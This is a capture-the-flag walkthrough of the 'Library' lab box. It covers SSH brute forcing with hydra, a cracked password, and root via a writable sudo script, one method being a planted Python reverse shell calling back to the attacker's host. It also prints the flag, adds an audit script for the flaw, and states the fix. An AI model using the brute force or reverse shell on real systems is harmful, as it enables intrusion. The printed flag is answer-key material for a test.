Nmap

```
└─$ nmap -sC -sV -oA nmap/library 10.10.157.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-27 11:55 EST
Nmap scan report for 10.10.157.19
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
|   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_  256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to Blog - Library Machine
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.15 seconds
```
So there are two open ports: ssh and http. The Apache version does not appear to have a remote code execution CVE.
Next, I tried to enumerate directories using gobuster and subdomains using ffuf, but nothing interesting showed up.
user flag
Two things give hints. First, the blog comments appear to contain usernames: root, www-data, meliodas and Anonymous. Second, robots.txt contains the word rockyou. So maybe SSH can be brute-forced with hydra?
Voila, we got the password for SSH.
```
└─$ hydra -L names.txt -P /usr/share/wordlists/rockyou.txt 10.10.157.19 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
...
[22][ssh] host: 10.10.157.19   login: meliodas   password: iloveyou1
```
root flag
Running sudo -l shows a file that we can run with sudo.

```
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
```
This is the content of the file:

```
meliodas@ubuntu:~$ cat bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
```
Here is the file structure:

```
meliodas@ubuntu:~$ ls -al
total 40
drwxr-xr-x 4 meliodas meliodas 4096 Aug 24  2019 .
drwxr-xr-x 3 root     root     4096 Aug 23  2019 ..
-rw-r--r-- 1 root     root      353 Aug 23  2019 bak.py
-rw------- 1 root     root       44 Aug 23  2019 .bash_history
-rw-r--r-- 1 meliodas meliodas  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 meliodas meliodas 3771 Aug 23  2019 .bashrc
drwx------ 2 meliodas meliodas 4096 Aug 23  2019 .cache
drwxrwxr-x 2 meliodas meliodas 4096 Aug 23  2019 .nano
-rw-r--r-- 1 meliodas meliodas  655 Aug 23  2019 .profile
-rw-r--r-- 1 meliodas meliodas    0 Aug 23  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 meliodas meliodas   33 Aug 23  2019 user.txt
```
bak.py is owned by root, but the home directory is owned by meliodas, so the file can be moved aside. The simple solution is to replace bak.py with a new file that spawns a shell and run it with sudo to get root.

```
meliodas@ubuntu:~$ mv bak.py bak.py.bk
meliodas@ubuntu:~$ vi bak.py
meliodas@ubuntu:~$ echo 'import pty; pty.spawn("/bin/bash")' > bak.py
meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py
root@ubuntu:~# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617
```
root flag - Method #2
echo $PATH shows that the meliodas home directory is on the path, and Python also searches the directory of the script being run before the standard library when resolving imports. So we can put our reverse shell in a file named after a library the program imports, such as zipfile, and it will be loaded instead of the real one.
A more detailed explanation of Python library hijacking: https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/

```
meliodas@ubuntu:~$ echo $PATH
/home/meliodas/bin:/home/meliodas/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```
On the server:

```
meliodas@ubuntu:~$ vi zipfile.py
meliodas@ubuntu:~$ cat zipfile.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.95.227",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
meliodas@ubuntu:~$ ls
bak.py  user.txt  zipfile.py  zipfile.pyc
meliodas@ubuntu:~$ sudo python3 /home/meliodas/bak.py
<active shell connection>
```
On the client:

```
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.95.227] from (UNKNOWN) [10.10.157.19] 50962
# whoami
root
# ls
bak.py
__pycache__
user.txt
zipfile.py
zipfile.pyc
# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617
```
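Both root methods rest on the same misconfiguration: the sudoers rule points at a script in a directory the caller owns, so the script can be replaced (method 1) or its imports shadowed from that directory (method 2). The audit script below is an added example, not part of the original writeup or the box; it takes a sudo-runnable script path and reports whether the caller can write the script or its directory and which imports a planted file would hijack. The `demo()` function rebuilds the bak.py layout in a temporary directory (constructed sample, with a harmless stand-in zipfile.py) rather than touching a real system.

```python
"""Audit a Python script that a sudoers rule lets a user run as root.
Python puts the script's own directory at sys.path[0], ahead of the standard
library, so any <module>.py planted there wins over the real import."""
import ast
import os
import tempfile
from pathlib import Path


def imported_modules(source):
    """Top-level module names the script imports (absolute imports only)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def writable_by(path, uid, gids):
    """Can uid (member of gids) write path, judging by owner/group/other bits?"""
    st = path.stat()
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & 0o200)
    if st.st_gid in gids:
        return bool(st.st_mode & 0o020)
    return bool(st.st_mode & 0o002)


def audit_sudo_script(script, uid, gids):
    """Return (kind, detail) findings for a script run as 'sudo python script'."""
    script = Path(script).resolve()
    findings = []
    dir_writable = writable_by(script.parent, uid, gids)
    if writable_by(script, uid, gids):
        findings.append(("writable-script", str(script)))   # method 1, direct edit
    if dir_writable:
        findings.append(("writable-dir", str(script.parent)))  # method 1, replace
    for name in sorted(imported_modules(script.read_text())):
        if (script.parent / f"{name}.py").exists():
            findings.append(("shadowed-import", name))   # method 2, already planted
        elif dir_writable:
            findings.append(("hijackable-import", name))  # method 2, could be planted
    return findings


def demo():
    """Rebuild the writeup's home-directory layout in a temp dir (constructed)."""
    home = Path(tempfile.mkdtemp())
    bak = home / "bak.py"
    bak.write_text("import os\nimport zipfile\n")  # same imports as the real bak.py
    bak.chmod(0o444)  # stands in for the root-owned 644 file the caller cannot edit
    (home / "zipfile.py").write_text("# planted stand-in, not a payload\n")
    return audit_sudo_script(bak, os.getuid(), {os.getgid()})
```

The fix on the defending side is to keep sudo-runnable scripts, and the directory they live in, owned by root and not writable by the invoking user, which makes both findings disappear.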